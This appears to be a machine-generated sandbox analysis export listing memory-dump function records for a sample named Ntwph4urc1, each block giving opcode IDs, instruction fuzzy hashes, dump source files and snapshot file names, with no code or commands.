                                            • Opcode ID: 7e63e108a4a07114b6f509949c721876efaae6843128505c5f869ca4065d393d
                                            • Instruction ID: d72444e9b07fa465a0a48be55462ccc788f9b06d923d9f9896d3859f1c41c46a
                                            • Opcode Fuzzy Hash: 7e63e108a4a07114b6f509949c721876efaae6843128505c5f869ca4065d393d
                                            • Instruction Fuzzy Hash: 67516770910318AFEF21CFA5CC81BDDBBB9FF06344F60412AE594AB192DB719948DB51
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 51854e45b76722a4e020319cb4b3ca64e909f94aa7a182a94af02a83b5fd5b4e
                                            • Instruction ID: 40149bf8f5d947afa8cb34f1d3d3cac4abd16ba45fc991ae31d96093b79ad7cb
                                            • Opcode Fuzzy Hash: 51854e45b76722a4e020319cb4b3ca64e909f94aa7a182a94af02a83b5fd5b4e
                                            • Instruction Fuzzy Hash: 8A51F179E10726DFE711CF6AC880699B7B4FF08728B205269E844DB751D734E991CBD0
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e34a641792a2e79be6bf0067dfbea21fe876c0422c27924c31e583a14ba6783b
                                            • Instruction ID: 7922560918c27ba0123f0ab885f9b7d53995045da41557c4c79043d694b9c50e
                                            • Opcode Fuzzy Hash: e34a641792a2e79be6bf0067dfbea21fe876c0422c27924c31e583a14ba6783b
                                            • Instruction Fuzzy Hash: 5F514C766083429FD701DF69C880B5ABBE5FFC8354F048A2DF9949B281D734E946CB92
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a80b7127ded1f595217fde907b39798ab154d820764d39f9290e48d27993a3be
                                            • Instruction ID: 7688f550cfb75e1a690fc122a11ac0e99b48c25aaaa3b4e133997dbedc083d51
                                            • Opcode Fuzzy Hash: a80b7127ded1f595217fde907b39798ab154d820764d39f9290e48d27993a3be
                                            • Instruction Fuzzy Hash: 19518C75A15315DFFB12CBA9CC80B9DB7B8AB04798F220018DA05EB252DBB5AD41CB91
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c02abd8d1085a931b97900ce13360628fdb8deab9ad098f3153f1360481e4403
                                            • Instruction ID: c0d8abe432403cc9f8455c4e6ccc3a96b8715ce8fad888db7046d38ee2625ad3
                                            • Opcode Fuzzy Hash: c02abd8d1085a931b97900ce13360628fdb8deab9ad098f3153f1360481e4403
                                            • Instruction Fuzzy Hash: C951B972A04311DFE712CF55C880A9AB7E9EF88368F11852AF8949B350D734ED46CBD2
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e71afb649981161aad09c08b5442337666a4693f10e70ea9927b2040fb6632a6
                                            • Instruction ID: b97623972d2674ce0153b21ddba792689ce0224a6f9e68f7113290346cffca3c
                                            • Opcode Fuzzy Hash: e71afb649981161aad09c08b5442337666a4693f10e70ea9927b2040fb6632a6
                                            • Instruction Fuzzy Hash: 7451BA75E00315CFDB14CFA9C890A8EBBF5BB58754F32852ADA54AB340DB30AD45CBA0
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 66201631693fdec6644635552b2c5b7d1ea60620aa2be14ebb21a7ef909d98c6
                                            • Instruction ID: 0dbc3940a367e2e453b61dc80d283a18c3d41fccc4f5518b54fb557462a43443
                                            • Opcode Fuzzy Hash: 66201631693fdec6644635552b2c5b7d1ea60620aa2be14ebb21a7ef909d98c6
                                            • Instruction Fuzzy Hash: 524166B6D00339ABEB11DBA98C40AAFB7BCAF04794F510166E904F7601EA34DD05CBE1
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b2c300d7f86a03933703e09635872856e70952263eb4647515a482bdea46eec2
                                            • Instruction ID: b6d0ccea717e7b536aaa39ca3d93015606abdbac364f370fb976548f03b12f92
                                            • Opcode Fuzzy Hash: b2c300d7f86a03933703e09635872856e70952263eb4647515a482bdea46eec2
                                            • Instruction Fuzzy Hash: 95517EB5640606EFDB05CF15C980A56BBF9FF46348F1580BAE908DF222E771E945CB90
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c09a94c6772d8e180decd02027e53b83413f09575d4e8a60a356dba088a45176
                                            • Instruction ID: e5df58570929a418209253fc9a603802aaf6a9fc5861492bfeda8efa5e591ef8
                                            • Opcode Fuzzy Hash: c09a94c6772d8e180decd02027e53b83413f09575d4e8a60a356dba088a45176
                                            • Instruction Fuzzy Hash: 8651F076B01791CFEB21CB19C840B1A73E9EB48B94F5600A5F900CB795DB74DC44DBA2
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0eb649ebbf3548d8df43d0789ceff5cfbc550e3c64e1c06ae1f98d8f26ebe946
                                            • Instruction ID: be1064ca100a0360cdbaa705eb64c4c802f5c5b03b2be59f2328f94dcc9a5062
                                            • Opcode Fuzzy Hash: 0eb649ebbf3548d8df43d0789ceff5cfbc550e3c64e1c06ae1f98d8f26ebe946
                                            • Instruction Fuzzy Hash: 7B5138B5E00206DFDB08CF69C49169ABBF5FF48314B60816ED819A7345E734EA85CF91
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4c5f322f698f6e1b61cfe021a3b3e72cd3c49e6eeeab11328c65eda2f9a5aa21
                                            • Instruction ID: c6b278b77fb2e7a57bcaf368ec263298a8f023cdb30ecc2deaccade4e3af7b96
                                            • Opcode Fuzzy Hash: 4c5f322f698f6e1b61cfe021a3b3e72cd3c49e6eeeab11328c65eda2f9a5aa21
                                            • Instruction Fuzzy Hash: 3141BAB1A40701EFEB22EF69CC80B1ABBF8AF14798F204469E5159B255DB70DC11CB91
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 42578d418b2934b02e14574336dc27f399143a583e550deea5e69334c708406a
                                            • Instruction ID: e433a76730ee39dc890af08513ad4590ae8350e835a9f3ba10474f68c05e7700
                                            • Opcode Fuzzy Hash: 42578d418b2934b02e14574336dc27f399143a583e550deea5e69334c708406a
                                            • Instruction Fuzzy Hash: 4741F2B15047409FE721DF69CC80E5AB7A9EF85360F10062DEA1557392DB31EC17CBA2
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d3ecdc75845e4efcf9a5524340a0558ffaffa1f42db526757369321156727b28
                                            • Instruction ID: ef92c4d19b5cb74d2567c9e6c8a7ddaf44df3cbaa7c88da00ddae2329e94f516
                                            • Opcode Fuzzy Hash: d3ecdc75845e4efcf9a5524340a0558ffaffa1f42db526757369321156727b28
                                            • Instruction Fuzzy Hash: 1031447AB00650AFE3128BA5CD55F6ABBE9EF45784F044151FC428F341DA38DC80CBA0
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 124864328812020a14b75ef7b216ea4b458457dc5cb74b518c04f40ca1fb2ad8
                                            • Instruction ID: 0cd7346b7efd62605b7e9a48fd0b2d5569a9031fbdf4d7cb2bf50c21e19ea062
                                            • Opcode Fuzzy Hash: 124864328812020a14b75ef7b216ea4b458457dc5cb74b518c04f40ca1fb2ad8
                                            • Instruction Fuzzy Hash: A741CBB1D01208AFDB14CFA6C840BEEBBF9FF48755F60842AE910A7251DB359801CF10
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1b893f6da4a2040c8ce1c46c2f78542654c76a1c7921431be7393efaf3457c3f
                                            • Instruction ID: 6de9e97c33b18b4d1fc665fa51433bc50ebcdbc56a0b31f2a14e4a6bc7cf4059
                                            • Opcode Fuzzy Hash: 1b893f6da4a2040c8ce1c46c2f78542654c76a1c7921431be7393efaf3457c3f
                                            • Instruction Fuzzy Hash: 86318275A0072CAFEB21CB25CC40B9A77B9EF85754F510199A54CA7280DB309E45CF91
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 991be0a160b167667d2e1f81ccca38596106b2c0819c6a22bd1a363d877f09be
                                            • Instruction ID: fc17004c00051c1554570333fd3ca421c83b5a50831d16dc2aa4e83ba20b3294
                                            • Opcode Fuzzy Hash: 991be0a160b167667d2e1f81ccca38596106b2c0819c6a22bd1a363d877f09be
                                            • Instruction Fuzzy Hash: D631CE75A01621CBE725CF2AC940AAF7BF9EF5579472580AEE445CB360EB30DC40C7A1
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b022692fe8b9e9848fdc1893cbbaccaa8075d22d17f181ab9d2aff15b1c15f9d
                                            • Instruction ID: 9ef22a99e6dd4c0f964431667b335e3b74d8787ed4459b2f5f6eb6c81262f247
                                            • Opcode Fuzzy Hash: b022692fe8b9e9848fdc1893cbbaccaa8075d22d17f181ab9d2aff15b1c15f9d
                                            • Instruction Fuzzy Hash: D531CE71A61711CFD720CF1AC880A1AB7F9FF48366B76846DE4498F618D772E841CB80
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4ccb0177d6147b0c4abe18ecd4a54e6acbfa7287a082c86dabab39786cf3b821
                                            • Instruction ID: 41770c6feaabd9bfaa7ca527b664fc9d0f5b7a72a65685f47f779c404e3c272c
                                            • Opcode Fuzzy Hash: 4ccb0177d6147b0c4abe18ecd4a54e6acbfa7287a082c86dabab39786cf3b821
                                            • Instruction Fuzzy Hash: 07316C70A01786BFE705DB75CD94BD9F758BF01148F25415AC51C8F202DB386A19DBE2
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9736ef1e2d2fe6ed3e8edd6ff05ccc53a0216fb05e956db353e68a80ecb75403
                                            • Instruction ID: 63a7f8c8e2968b29aff51be90c9666ef58c01ac48e8f54fe03b23e4cf0bf3681
                                            • Opcode Fuzzy Hash: 9736ef1e2d2fe6ed3e8edd6ff05ccc53a0216fb05e956db353e68a80ecb75403
                                            • Instruction Fuzzy Hash: 68312231A08351DBEB61CE29C840757B7A8AF84795F64812AF8848B285DE34CC41C7E2
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a36d76ad62eb14ba1d93e45d5da57c7e8db5234a726b9b567eb27928172412ad
                                            • Instruction ID: 0b7f59caa61ff939aad117d359e1d3957ddfa94cf0f1840bca58ea2d3fb5d868
                                            • Opcode Fuzzy Hash: a36d76ad62eb14ba1d93e45d5da57c7e8db5234a726b9b567eb27928172412ad
                                            • Instruction Fuzzy Hash: F131BCB5601701DFD32ACF19CC90A6AB3B9EF84348B61855DE1098B752EB72EC46CBD0
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID:
                                            • API String ID: 3446177414-0
                                            • Opcode ID: adb54e3dc2ad614e3548d659d834c4adb24ddd030e8c0e1162e0d2dc370008eb
                                            • Instruction ID: a38e841fee405b283ad70b89bcb2ada0dc7f095f04b84e1c235680885246a11d
                                            • Opcode Fuzzy Hash: adb54e3dc2ad614e3548d659d834c4adb24ddd030e8c0e1162e0d2dc370008eb
                                            • Instruction Fuzzy Hash: 8021F276918714AFE723EF5AC800B0A7BF9FB84B64F210429AA559B341DB35DC01CB91
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 759af7da7484718429cce7f3e89ec17e8e493d8f66f8a62f4e587b70ab487789
                                            • Instruction ID: dc1ee6634b267e0fd60e422d167c20f9f3bf8ea251e8c5bce0cd00d50dd7d29a
                                            • Opcode Fuzzy Hash: 759af7da7484718429cce7f3e89ec17e8e493d8f66f8a62f4e587b70ab487789
                                            • Instruction Fuzzy Hash: E731E1BEA05304AFEB23EE55C980B5E73EDEB84794F228429EC049B201D770DD48CB90
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f12ca3b2acced05fecadcdf59cde285bbc34f8445301a10fa8c700101f1cd99f
                                            • Instruction ID: 85435412a8ece36caef57c4f5fd857fb611c1e23dd29e24d77524ffac2dda799
                                            • Opcode Fuzzy Hash: f12ca3b2acced05fecadcdf59cde285bbc34f8445301a10fa8c700101f1cd99f
                                            • Instruction Fuzzy Hash: 4241A2B5D00318DEDB21DFAAD980AEEFBF4BB48300F5041AEE509A7240DB349A85CF51
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2963604b138b45d82781e0a3e479f75d70978de019cd50ff7a7906112cbdd64f
                                            • Instruction ID: 596be664d3f02038c5210f826ad55b36d068e6ff50743c4a5d533bd020ce4931
                                            • Opcode Fuzzy Hash: 2963604b138b45d82781e0a3e479f75d70978de019cd50ff7a7906112cbdd64f
                                            • Instruction Fuzzy Hash: 7D319AB1608359CFDB01CF19D84095A7BE9FF89394F11056AF9549B3A1DB30DC04CBA6
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3d9f232daa6456112ef7cca9ac13d1ecc1d2608bc40d33be58fee952b0e99bbe
                                            • Instruction ID: e0d7093bc3dae89dfdd0ff57ae26a0d7e65a5677ee73017b08bffe6602254b60
                                            • Opcode Fuzzy Hash: 3d9f232daa6456112ef7cca9ac13d1ecc1d2608bc40d33be58fee952b0e99bbe
                                            • Instruction Fuzzy Hash: 7F313879A04306CFC700CF19C894956BBF9FF89354B2585A9E9589B315EB30ED06CB91
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5792c921ca3ca2bbbe232b517931b81ea903973909e8099156e3e3dd86bc70c3
                                            • Instruction ID: 5011067fcdba735513e7e9e499c8b87d5f219571e2221a9956b3aa4d3e4ea70f
                                            • Opcode Fuzzy Hash: 5792c921ca3ca2bbbe232b517931b81ea903973909e8099156e3e3dd86bc70c3
                                            • Instruction Fuzzy Hash: 13214C75A00214EFE711CB9BDC80E9BBBBDEF49A94F524165EA0597210E634EE00DBA0
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0ce816f247fe5f563bbaf608dfee83b7551cf858278b173cde6cdafcec51ed29
                                            • Instruction ID: c163e2d0140f6dc0683d43fd3c7215350b7fd9a749ff6f3d540a40439973dd4f
                                            • Opcode Fuzzy Hash: 0ce816f247fe5f563bbaf608dfee83b7551cf858278b173cde6cdafcec51ed29
                                            • Instruction Fuzzy Hash: 9B31E570A107818FD355CF2AC940722BBE9FF85325F25C92DE4A98B291C732DC46CB91
                                            Memory Dump Source
